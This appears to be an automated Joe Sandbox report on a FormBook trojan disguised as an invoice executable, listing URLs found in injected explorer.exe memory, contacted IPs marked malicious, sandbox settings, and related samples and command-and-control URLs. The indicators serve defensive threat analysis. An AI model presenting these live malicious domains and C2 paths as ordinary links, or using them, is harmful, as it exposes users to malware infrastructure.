                                          http://www.rgrogerscreations.com/ps94/www.light-in-the-heavens.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.0909000000.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://excel.office.com-explorer.exe, 00000006.00000002.4582922862.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984825740.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.forluvofcomedy.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xsmci844n.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.norlac.xyz/ps94/www.xsmci844n.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.htgithub.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://powerpoint.office.comEMdexplorer.exe, 00000006.00000002.4582720574.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.huskyacres.netReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.light-in-the-heavens.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.htgithub.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hregrhherdhretdhrt.xyz/ps94/www.streamfly.videoexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.forluvofcomedy.com/ps94/www.t5u2s.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vpdyt637j.xyz/ps94/www.hregrhherdhretdhrt.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com:443/en-us/feedexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.norlac.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          198.185.159.144
                                          		ext-sq.squarespace.comUnited States
                                          		53831SQUARESPACEUSfalse
                                          156.67.74.121
                                          		huskyacres.netUnited States
                                          		201341TESONETLTtrue
                                          103.224.182.210
                                          		www.htgithub.comAustralia
                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                          44.227.76.166
                                          		pixie.porkbun.comUnited States
                                          		16509AMAZON-02UStrue
                                          93.127.208.60
                                          		light-in-the-heavens.comGermany
                                          		62255ASMUNDA-ASSCtrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1465308
                                          Start date and time:2024-07-01 15:09:35 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 12m 11s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Sample name:INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@523/6@14/5
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 201
                                          • Number of non-executed functions: 310
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          09:10:26API Interceptor1x Sleep call for process: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe modified
                                          09:10:28API Interceptor10x Sleep call for process: powershell.exe modified
                                          09:10:37API Interceptor7801939x Sleep call for process: explorer.exe modified
                                          09:11:18API Interceptor7506068x Sleep call for process: msiexec.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          198.185.159.144Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • www.bankablebark.com/dy13/?jDHph=9ZSG7Fw6wFJMggGvtga1Qh3mQQl9Rgy3K16+Oe6KY82/n3IrznmlP/WDuEbFz6mxdG1sfeS45g==&Wt=IBZX4leh3ZCl
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • www.nearmeacupuncture.com/dy13/?Rzr=Lbyx94Ip0tNX&alI=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2
                                          unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.wearelemonpepper.com/aqhg/
                                          iY.exeGet hashmaliciousFormBookBrowse
                                          • www.emran-tahhan.com/ss63/?Unw0O=GTgtavpHB8N4TP4&tZUX=p4TEw9iz4qBdtQ5yH91M1wmb999p8Er4ZWwps9U3gumra0J2oW8DNKocPs/6gBJUGPFr
                                          http://sbb.smartisedesign.com/Get hashmaliciousUnknownBrowse
                                          • sbb.smartisedesign.com/
                                          Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.wearelemonpepper.com/aqhg/
                                          swift copy.exeGet hashmaliciousFormBookBrowse
                                          • www.svhomesinspections.com/as02/?-Z1hnl=TQkFU3w70Gl1x4mOZimcDIzEgZC5+SbQtzHhpSx2IV5Yy8QbIt5+CNu2vOYGRv6gQTaH&2d=o8rha
                                          103.224.182.210http://learningstudio.aiGet hashmaliciousUnknownBrowse
                                          • learningstudio.ai/
                                          http://followfoxconn.siteGet hashmaliciousUnknownBrowse
                                          • followfoxconn.site/
                                          file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                          • editor.editorcms11.eu/PhpMyAdmin/
                                          S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                          • followerstiktok.xyz/admin/
                                          2Lv4zBMFDA.exeGet hashmaliciousFormBookBrowse
                                          • www.9bartv.net/ge83/?RnKp_D=WFNX4xohKxZHw&1bPD=dPNXIuPu02TWlD+/AdZVMpf+iXZnbTtq1s9z6hH+yPXoWMEp8UbU8ekONh2SVjldMypX
                                          Copia_di_pagamento.exeGet hashmaliciousFormBookBrowse
                                          • www.eletrobrasilvendas.com/he2a/?1bxHZX9p=/xd6K0SRwlHfyv4gPEMONUuUWJ70v1uiWG7wzHQtqGuNwtT8jxHjR6cNWNtG0WK181Kc&6l=7nSd4VfxEPwT3DA0
                                          Request_For_Quotation.exeGet hashmaliciousFormBookBrowse
                                          • www.sespeciess.club/q6at/?hnhHyfP=c/cPs20UAagrlmBeG1jvq1uTXGdr9xurZKpNWBHstbL2O1l+Uiu43HswxzkrFeYFk8NK4UKZ4w==&r0GP9=PBZhCb5HbB-LvT
                                          Confirm!!...exeGet hashmaliciousFormBookBrowse
                                          • www.eletrobrasilvendas.com/he2a/?6l=6lSd3LGp-&oPZ4Bzux=/xd6K0SRwlHfyv4gPEMONUuUWJ70v1uiWG7wzHQtqGuNwtT8jxHjR6cNWNtG0WK181Kc
                                          4A290F482706AB37BF00CE655653F7D07C3617416ED69.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                          • panelone.xyz/post.php
                                          Our request file PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.eletrobrasilvendas.com/he2a/?8p=/xd6K0SRwlHfyv4gPEMONUuUWJ70v1uiWG7wzHQtqGuNwtT8jxHjR6cNWOBv3W2N1W/Kw7OE0g==&3fMty=eTqt7tbPg8
                                          44.227.76.166PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                          • www.transpecosexpress.com/ps94/?C8_=NZ9eraEhv94yON/2bUX4SSFhEhWB0QBw+0BDZem6mAjxIxJreavZH/9X5KJNbsl6onHw&P2M=FndT-tAhAldhtL
                                          PO TRO-1075 - TRO-1076 904504608468.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.cryptoautomata.dev/rn94/?UTF4x=hvXN74gR2akgZUtudteNo+n4lL6Uz5IreJLTQXSt/BZycGk7ff6ZSt7RcUJ03SxS0PX0&WXr=jDKXzfrpmlKTeV
                                          Eugg3yid0O.exeGet hashmaliciousFormBookBrowse
                                          • www.manipulatedalgorithms.com/ss63/?pR-DxpMX=OCjNvEXxKmgJX/Q7gR/sPiH2o5CrMit8uJQ6u6tRtGja0+5d8rn+l4UMh4fm+GuA5a1U&STg8y2=zbRdgzqphT8
                                          file.exeGet hashmaliciousCMSBruteBrowse
                                          • googl.win/admin/
                                          Purchase Order For Consumables Eltra 888363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                          • www.omf.fo/se62/?OXa=o6CIkPWAqwJrAD0JA0a23QeJHx6aqaexac/HofZVtscZoVbzuhZfDa1OyC96VHHOVBof&E81=O2JdWDzPe
                                          UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                          • www.purifyelements.com/fs83/?K6kd=Tdj3wg1A+IaUQEQjdnjcQVTH+B51LJK5yRXBanr8pNNyglQf2u9TEnq8fI8EkKmX06yx3SueoA==&uTrL=_bj8lfEpU
                                          3PhhXne1YD.exeGet hashmaliciousFormBookBrowse
                                          • www.purifyelements.com/fs83/?Ur=LjwLdnb8MJ&TL3=Tdj3wg1A+IaUQEQjdnjcQVTH+B51LJK5yRXBanr8pNNyglQf2u9TEnq8fI8977GU6su23SuZ7w==
                                          PO#2420009.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.digitalmakeads.cloud/fr07/?mdsP=UxlT&_8fdM=YBeS0BtHsiAB2IHxgOslx3DSeavwhO0cVNXZtqYyTb4B3jsfMLJR/Z09uF3/F7vTmMSat3qGCg==
                                          rBancofiecompro.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.ketoalycetiworks.buzz/pz08/?rDKp5F=BlzGoyyqVdetslIYjfZXAkVcIimdZ0/uOJCimNan+DzWu9atR6RO3R4DchLJfRgE/xRC&pPf=kDK0IBv8Nx6
                                          OT1dxr7S0e.exeGet hashmaliciousFormBookBrowse
                                          • www.saltyviagem.com/g05b/?H0GpFb=KA1w6CY16rKVdezOE15Nsqrx/Ey3/egcJ8LUozW4rYWY4zzY8NyWOlHNODV+ZJVUqEGm&wX=NZ_hit

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.whatsapp-p.vipPROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                          • 34.96.226.230
                                          pixie.porkbun.comPROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          MT103-746394.docGet hashmaliciousFormBookBrowse
                                          • 44.227.65.245
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 44.227.65.245
                                          PO TRO-1075 - TRO-1076 904504608468.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          Eugg3yid0O.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          Maersk Arrival Notice ready for Bill of Lading 238591458-393747337-837473734-283473743.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.65.245
                                          Purchase Order For Consumables Eltra 888363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          3PhhXne1YD.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          PO#2420009.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 44.227.76.166
                                          ext-sq.squarespace.comAtt0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          MT103-746394.docGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 198.185.159.145
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 198.185.159.144
                                          iY.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          http://sbb.smartisedesign.com/Get hashmaliciousUnknownBrowse
                                          • 198.185.159.144

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TRELLIAN-AS-APTrellianPtyLimitedAUPO - 04755 .bat.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.242
                                          288292021 ABB.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          RITS Ref 3379-06.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.246
                                          NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          Contract-document.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 103.224.212.213
                                          M.R NO. 1212-00-RE-REQ-649-01.scr.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          http://memekombat-in.web.app/app/Get hashmaliciousUnknownBrowse
                                          • 103.224.212.213
                                          PMP-INS-93-2436-IN-1017.scr.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          http://protect.dscsec.com/software.htmGet hashmaliciousHTMLPhisherBrowse
                                          • 103.224.182.24
                                          ASMUNDA-ASSChttp://guardianesdelbosque.orgGet hashmaliciousUnknownBrowse
                                          • 93.127.186.63
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 93.127.196.6
                                          https://funandeat.dk/19nas7/?05101243Get hashmaliciousUnknownBrowse
                                          • 93.127.217.226
                                          https://gbmk.co.uk/wjad/?26590243Get hashmaliciousUnknownBrowse
                                          • 93.127.217.226
                                          06V2RO89xu.elfGet hashmaliciousMiraiBrowse
                                          • 93.127.162.227
                                          BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                          • 93.127.187.187
                                          FacturasEnAdjunto-HHH.htaGet hashmaliciousUnknownBrowse
                                          • 93.127.215.82
                                          https://u44238375.ct.sendgrid.net/ls/click?upn=u001.9AsucPp4zP0gr32MmqN46Ca97P9HJMsiL8PsYH2wBLS5GwJlqoobKWhMdUVIedAMe4LyMgQ7NM8LfDosJkyKLUglurVwqAzf-2BdbQ-2BGBdv-2BoguQ0HpDttE7YxTyub76yBwMrv9q-2BUQTALmnRk9vxLJY897XSLn4EFaptFccEkQhkg088XcaXDkt5VGoxEIMnUpmM-2FVXiyNvsvYY2tzQoKnOlupuWTHpjbe-2Fp0AtR4ASY-3Dx2F-_5AQtw215kf05WwYFhg3cZz-2BKu5qlyvVzK0FHOE6SFbSY-2F-2Bu9cg-2F-2F4qPxOtKBVRGzAfX0W-2F5dnsI5pygnFXo8-2B5C0zcqr-2FoOX2gs-2BnYeOkQ2Psb2FKSHtuQgO8Viqrc4L-2B8BEWB6-2BLtyj4b-2FyH3NbU0gi0ascLj88F7XD0o4iWBAcCSHvuYMHy1anMCj2qAqhZhIVbNzB-2FPuF1hVupZCtQbbXyvnae2k0hq3abQJPktc-3DGet hashmaliciousHTMLPhisherBrowse
                                          • 93.127.215.173
                                          LekwisnOvb.elfGet hashmaliciousMoobotBrowse
                                          • 93.127.202.32
                                          jAgj6bRWaJ.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 91.108.78.249
                                          SQUARESPACEUSAtt0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                          • 198.185.159.145
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 198.185.159.145
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 198.185.159.144
                                          iY.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          http://sbb.smartisedesign.com/Get hashmaliciousUnknownBrowse
                                          • 198.185.159.144
                                          TESONETLTDocumento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                          • 185.148.106.71
                                          http://www.open-sora.orgGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                          • 156.67.75.29
                                          OPs5j7Yjb8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 156.67.72.41
                                          52cMXV8Al2.elfGet hashmaliciousMiraiBrowse
                                          • 156.67.72.45
                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 195.158.206.227
                                          TAVMCtVXa5.exeGet hashmaliciousUnknownBrowse
                                          • 156.67.72.10
                                          kn328E7C2B.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                          • 156.67.71.68
                                          #U0111#U01a1n h#U00e0ng m#U1edbi pdf.exeGet hashmaliciousFormBookBrowse
                                          • 156.67.71.229
                                          0jwySdaiGH.exeGet hashmaliciousFormBookBrowse
                                          • 156.67.71.229
                                          #U043d#U043e#U0432#U0430_#U043f#U043e#U0440#U044a#U0447#U043a#U0430i_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 156.67.71.229
                                          AMAZON-02USMaterials specification with quantities.exeGet hashmaliciousFormBookBrowse
                                          • 3.64.163.50
                                          PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                          • 44.227.76.166
                                          Payment_AdviceHyperoptic.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 13.32.99.118
